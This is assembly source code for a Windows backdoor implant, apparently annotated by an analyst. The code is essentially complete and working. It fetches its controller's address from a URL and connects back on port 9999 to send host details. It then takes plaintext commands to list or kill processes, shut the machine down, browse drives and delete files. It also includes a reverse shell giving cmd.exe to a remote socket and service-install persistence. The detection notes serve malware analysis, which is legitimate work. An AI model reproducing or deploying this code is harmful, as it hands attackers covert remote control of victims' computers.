mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
.while eax
invoke lstrlen,addr stProcess.szExeFile
invoke send,_socket,addr stProcess.szExeFile,eax,0
; invoke MessageBox,0,addr stProcess.szExeFile,0,0
invoke Sleep,1000
invoke Process32Next,hSnapShot,addr stProcess
.endw
ret
_GetProcessList endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
; Enables (bFlags != 0) or disables the privilege named by szPriv on the
; current process token using the documented token API.  Returns the
; AdjustTokenPrivileges result in eax; that API can succeed even when the
; privilege is not held (ERROR_NOT_ALL_ASSIGNED), and GetLastError is not
; checked here.  No caller is visible in this file — _ExitWindows uses the
; undocumented RtlAdjustPrivilege instead.
LOCAL hToken
LOCAL tkp : TOKEN_PRIVILEGES
invoke GetCurrentProcess ; pseudo-handle of the current process
mov edx, eax
invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken ; open the process access token
invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid ; LUID of the named privilege
mov tkp.PrivilegeCount, 1
xor eax, eax
.if bFlags
mov eax, SE_PRIVILEGE_ENABLED
.endif
mov tkp.Privileges.Attributes, eax
invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0 ; apply the change to the token
push eax
invoke CloseHandle, hToken
pop eax ; return AdjustTokenPrivileges' result
ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ReadInternet proc
; Downloads the controller's IP address from szUrl with WinINet (User-Agent
; "ReadFile", redirects disabled) into the global szIP — a dead-drop
; resolver: the implant carries no hard-coded C2 address, only the URL of a
; text file.  Called by _Main before every connect attempt, so a plain HTTP
; GET for that URL with that User-Agent precedes every beacon; blocking or
; sinkholing that URL stops the implant from finding its controller.
; The byte count written to @dwRead is not used; szIP relies on the
; zero-initialised .data? section for its terminator.
local @hSession,@hHttpFile,@dwRead ; locals
pushad ; preserve all registers
; invoke RtlZeroMemory,addr szIP,sizeof szIP
invoke InternetOpen,CTXT("ReadFile"),INTERNET_OPEN_TYPE_PRECONFIG,/
NULL,NULL,0 ; open a WinINet session
.if eax ; test the return value
mov @hSession,eax ; keep the session handle
.endif
invoke InternetOpenUrl,@hSession,addr szUrl,NULL,0,INTERNET_FLAG_NO_AUTO_REDIRECT,0
.if eax
mov @hHttpFile,eax
.endif
invoke InternetReadFile,@hHttpFile,addr szIP,sizeof szIP,addr @dwRead ; read the IP text into szIP
invoke InternetCloseHandle,@hHttpFile ; close the handles
invoke InternetCloseHandle,@hSession
popad ; restore registers
ret
_ReadInternet endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Cmd proc
; Reverse shell: connects a fresh TCP socket to szIP:8888 (the controller
; host resolved by _ReadInternet) and launches "cmd" with stdin/stdout/
; stderr redirected to that socket (dwFlags 101h = STARTF_USESTDHANDLES or
; STARTF_USESHOWWINDOW, window hidden, handles inherited).
; No call to _Cmd is visible in this file.
; Detection: a cmd.exe child of this process whose standard handles are a
; socket, and an outbound connection to port 8888 carrying console text in
; the clear.
local @wsaData:WSADATA
local @stAddr:sockaddr_in
local stStartUp:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
local hSocket
invoke WSAStartup,202h,addr @wsaData ; initialise Winsock 2.2
invoke WSASocket,PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ; create the socket
mov hSocket,eax ; keep the handle
mov @stAddr.sin_family,AF_INET ; address family
invoke htons,8888 ; port
mov @stAddr.sin_port,ax ; store it
invoke inet_addr,addr szIP ; convert the downloaded IP text
mov @stAddr.sin_addr,eax
invoke connect,hSocket,addr @stAddr,sizeof @stAddr ; connect out to the controller
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke GetStartupInfo,addr stStartUp
mov ebx,hSocket ; socket handle in ebx
mov stStartUp.hStdInput,ebx ; point the child's standard handles at the socket
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.dwFlags,101h
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,CTXT("cmd"),NULL,NULL,1,0,NULL,NULL,addr stStartUp,addr stProcInfo
invoke WaitForSingleObject,addr stProcInfo.hProcess,INFINITE ; intended: block until the child exits
invoke closesocket,hSocket
ret
_Cmd endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CreateSerice proc
; Persistence: (re)creates a Win32 service named "GetSysService" (display
; name "GetSysForShellexecute") whose binary path is this executable
; (GetModuleFileName into a MAX_PATH buffer, 200 bytes requested),
; SERVICE_AUTO_START, own-process + interactive, and starts it.  Any
; existing service of that name is deleted first.  The call from _Main is
; commented out, so this build does not install itself.
; Detection: service-installation events (System log 7045 / Security 4697)
; for that service name, and an auto-start service whose ImagePath points
; outside system locations.  The program has no service main/handler, so
; presumably the SCM starts it as a plain process that never reports
; SERVICE_RUNNING.
LOCAL hSCManager
LOCAL hService
LOCAL szBuff[MAX_PATH] :byte
LOCAL ServiceStatus:SERVICE_STATUS
invoke OpenSCManager, NULL, NULL, SC_MANAGER_Create_SERVICE ; connect to the service control manager
.if eax!=0
mov hSCManager, eax ; connected; keep the handle
invoke OpenService, hSCManager,CTXT("GetSysService"), Delete ; open an existing service of that name
.if eax!=0 ; (original comment says "open failed", but this branch runs on success)
push eax ; handle for the manual CloseServiceHandle call below
invoke DeleteService, eax
call CloseServiceHandle
.endif
invoke GetModuleFileName,NULL,addr szBuff,200
invoke CreateService, hSCManager,CTXT("GetSysService"),CTXT("GetSysForShellexecute"),/ ; create the service
SERVICE_START + SERVICE_QUERY_STATUS + Delete, /
SERVICE_WIN32_OWN_PROCESS + SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START, /
SERVICE_ERROR_IGNORE, addr szBuff,NULL, NULL, NULL, NULL, NULL
.if eax!=0
mov hService, eax
invoke StartService, hService, 0, NULL ; start it
invoke CloseServiceHandle, hService
.endif
invoke CloseServiceHandle, hSCManager
.endif
ret
_CreateSerice endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;应该当作一个指针。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SendSysInfo proc _socket:LPSTR
; Builds and sends the agent's check-in ("host online") record over _socket
; (declared LPSTR, but it carries the SOCKET):
;   - host name (gethostname) and its first IPv4 address (gethostbyname ->
;     hostent.h_addr_list at offset 12 -> first entry -> inet_ntoa),
;   - the current UTC time from GetSystemTime formatted as month/day/hour/
;     minute (the format string labels the last field as seconds),
;   - the string value szKey under HKLM\szRegKey, if present, as a free-text note.
; The fields are copied into the global MSG_SYSINFO `sysinfo`; that struct
; is then appended to szSysinfoData with lstrcat (i.e. treated as a
; NUL-terminated string), followed by the literal tag "[info]", and the
; result is sent.  szSysinfoData is never cleared, so each reconnect appends
; to it again.
; Network tell: the first message on the port-9999 connection is plaintext
; ending in "[info]".
local OS:OSVERSIONINFO
local szTime:SYSTEMTIME
local szTimeBuff[1024]:DWORD
local sa:in_addr
local @hKey:DWORD
local BufSize:DWORD
pushad
invoke gethostname,addr szHostName,sizeof szHostName
invoke gethostbyname,addr szHostName
mov eax,[eax+12] ; hostent.h_addr_list
mov eax,[eax] ; first address pointer
mov eax,[eax] ; the IPv4 address itself
invoke inet_ntoa,eax
invoke wsprintf,addr szHost,CTXT("%s"),eax
invoke lstrcpy,addr sysinfo.szHostIP,addr szHost
invoke lstrcpy,addr sysinfo.szHostName,addr szHostName
invoke GetSystemTime,addr szTime
movzx ebx,szTime.wMonth
movzx eax,szTime.wDay
movzx ecx,szTime.wHour
movzx edx,szTime.wMinute
invoke wsprintf,addr szTimeBuff,CTXT("%d月%d日%d时%d秒"),ebx,eax,ecx,edx
invoke lstrcpy,addr sysinfo.szHostTime,addr szTimeBuff
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKey,NULL, KEY_QUERY_VALUE,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegQueryValueEx,@hKey,addr szKey,NULL,NULL,addr szKeyName,addr BufSize ; read the note value
.if eax == ERROR_SUCCESS
invoke lstrcpy,addr sysinfo.szWhat,addr szKeyName ; present: copy it in
.elseif
invoke RtlZeroMemory,addr sysinfo.szWhat,sizeof sysinfo.szWhat ; absent: clear the field
.endif
invoke RegCloseKey,@hKey
.endif
invoke lstrcat,addr szSysinfoData,addr sysinfo
invoke lstrcat,addr szSysinfoData,CTXT("[info]")
;--------------------------------------------------------------------------------------------------
;
;******** "[info]": what precedes it is the custom record, the tag itself is the marker the
;         controller looks for; after extracting the marker the remainder is the record
;
;---------------------------------------------------------------------------------------------------
invoke lstrlen,addr szSysinfoData
invoke send,_socket,addr szSysinfoData,eax,0
popad
ret
SendSysInfo endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Main proc
; Implant main loop (runs on the thread created in `start`):
;  1. WSAStartup; build a sockaddr for TCP port 9999 (must match the
;     controller's _Init); resolve the controller IP through _ReadInternet
;     (an HTTP fetch of szUrl); connect the global `server` socket.  On
;     failure fall through to _Ret, sleep 1 s and start over — so an
;     unreachable controller yields a steady once-per-second HTTP GET + TCP
;     SYN pattern from this host.
;  2. Send the check-in record (SendSysInfo, ends with "[info]").
;  3. Loop forever: recv up to 1024 bytes into lpBuffer and scan it for
;     plaintext tags; each recognised tag starts a worker thread:
;       "[getprocess]"        -> _GetProcessList  (list processes)
;       "<name>[killprocess]" -> _KillProcess     (payload = bytes before the
;                                                  13-byte tag, copied to buff2)
;       "[exitwindows]"       -> _ExitWindows     (immediate power-off)
;       "[getfile]"           -> _GetFileDsik     (list drives)
;       "<path>[getfilepaht]" -> _GetFilePath     (list directory; payload -> buff3)
;       "<path>[delfile]"     -> _DelFile         (delete file; payload -> buff4)
;       "Upfile"              -> payload -> buff5; handler commented out
;     Payload extraction assumes the tag is the last thing in the message.
;     The recv() result (@dwRecv) is stored but never tested, so after the
;     controller disconnects the loop spins on a failing recv() — one core
;     at 100 % is an easy host-side tell.  Worker thread handles are never
;     closed.  Commands are neither authenticated nor encrypted: whoever
;     controls the address published at szUrl controls this host.
;  The persistence call (_CreateSerice) is commented out; the final `ret`
;  after `jmp connectstart` is unreachable.
local @temp:SOCKET
local @stAddr:sockaddr_in
local @dwRecv
; call _CreateSerice ; install as a system service (original note: should be done at first start)
connectstart:
invoke WSAStartup,202H,addr @stData
invoke RtlZeroMemory,addr @stAddr,sizeof sockaddr_in
mov @stAddr.sin_family,AF_INET
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; The port connected to here must match the one the controller listens on
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke htons,9999
mov @stAddr.sin_port,ax
call _ReadInternet ; fetch the controller IP into szIP
invoke inet_addr,addr szIP
mov @stAddr.sin_addr,eax
invoke socket,AF_INET,SOCK_STREAM,0
mov server,eax
invoke connect,server,addr @stAddr,sizeof @stAddr
.if eax == SOCKET_ERROR
jmp _Ret ; controller unreachable: clean up and retry
.endif
invoke SendSysInfo,server ; send the check-in record
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Loop handling controller commands
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.while TRUE
invoke RtlZeroMemory,addr lpBuffer,sizeof lpBuffer
invoke recv,server,addr lpBuffer,1024,0
mov @dwRecv,eax ; stored, never checked
invoke StrStr,addr lpBuffer,CTXT("[getprocess]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _GetProcessList,server,0,addr ThreadId
.endif
invoke StrStr,addr lpBuffer,CTXT("[killprocess]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,13 ; drop the 13-byte "[killprocess]" tag
lea esi,lpBuffer
lea edi,buff2
add esi,0 ; no-op
mov ecx,eax
rep movsb ; process name -> buff2
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _KillProcess,addr buff2,0,addr ThreadId1
.endif
invoke StrStr,addr lpBuffer,CTXT("[exitwindows]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _ExitWindows,0,0,addr ThreadId2
.endif
invoke StrStr,addr lpBuffer,CTXT("[getfile]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _GetFileDsik,server,0,addr ThreadId3
.endif
invoke StrStr,addr lpBuffer,CTXT("[getfilepaht]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,13 ; drop the 13-byte "[getfilepaht]" tag
lea esi,lpBuffer
lea edi,buff3
add esi,0 ; no-op
mov ecx,eax
rep movsb ; directory path -> buff3
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _GetFilePath,addr buff3,0,addr ThreadId4
.endif
invoke StrStr,addr lpBuffer,CTXT("[delfile]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,9 ; drop the 9-byte "[delfile]" tag
lea esi,lpBuffer
lea edi,buff4
add esi,0 ; no-op
mov ecx,eax
rep movsb ; file path -> buff4
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _DelFile,addr buff4,0,addr ThreadId5
.endif
invoke StrStr,addr lpBuffer,CTXT("Upfile")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,6 ; drop the 6-byte "Upfile" tag
lea esi,lpBuffer
lea edi,buff5
add esi,0 ; no-op
mov ecx,eax
rep movsb ; payload -> buff5 (no handler follows)
mov byte ptr [edi],0
popad
; invoke MessageBox,0,addr buff5,0,0
; invoke CreateThread,NULL,0,addr _UpFile,server,0,addr ThreadId7
.endif
.endw
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Ret:
.if server
invoke closesocket,server
xor eax,eax
mov server,eax
.endif
invoke WSACleanup
invoke Sleep,1000 ; 1 s back-off before reconnecting
jmp connectstart
ret
_Main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start proc
; Implant entry point.  Single-instance guard through the named mutex
; "GetSys1_Mutex": if GetLastError is 0B7h (ERROR_ALREADY_EXISTS) another
; copy is running and nothing is started.  Otherwise _Main runs on a new
; thread (the pushed ecx stack slot serves as lpThreadId) and this thread
; parks in a GetMessage loop; no window is ever created, so the process
; simply stays resident without any UI.  The mutex name is a host-based
; indicator of this implant.  ebx is overwritten without being preserved;
; the `ret` after the endless loop is unreachable.
invoke CreateMutex, NULL, TRUE,CTXT("GetSys1_Mutex")
mov ebx,eax
invoke GetLastError
.if eax!=0B7h ; not ERROR_ALREADY_EXISTS: first instance
push ecx
invoke CreateThread,NULL,0,offset _Main,0,NULL,esp
pop ecx
invoke CloseHandle,eax
.elseif
mov eax,FALSE
.endif
;********************************************************************
; Message loop (keeps the process alive)
;********************************************************************
.while TRUE
invoke GetMessage,addr stMsg,NULL,0,0
invoke DispatchMessage,addr stMsg
.endw
ret
start endp
end start